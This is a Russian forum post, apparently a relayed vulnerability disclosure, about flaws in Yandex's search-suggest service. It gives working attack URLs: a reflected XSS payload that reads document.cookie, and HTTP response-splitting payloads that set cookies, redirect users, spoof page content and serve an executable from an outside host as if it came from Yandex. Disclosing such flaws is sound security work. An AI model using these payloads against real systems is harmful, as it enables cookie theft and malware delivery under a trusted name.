В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости
[B]* Тип уязвимости:[/B] Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
[B]Приложение[/B]: /suggest-ya.cgi
GET-переменные: part
[B]Пример[/B]: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>
[B]* Тип уязвимости:[/B] Расщепление HTTP-запроса (HTTP Response Splitting)
Приложение: /suggest-ya.cgi
GET-переменные: ct
Пример: [url]http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru[/url] (устанавливает cookie от имени сервера)
[B]Простые примеры применения, не говоря уже о сложных вариантах.[/B]
* Универсальный редиректор - [url]http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru[/url]
* Использование уязвимостей других приложений или распостранение вирусов (подмена content-type)
Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса
[url]http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru[/url]
Или любое другое приложение или мультимедиа-файл. К примеру.
[url]http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru[/url]
* Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru<script>//&part=fuzzing.ru
[URL="http://www.securitylab.ru/news/361371.php"]securitylab.ru[/URL]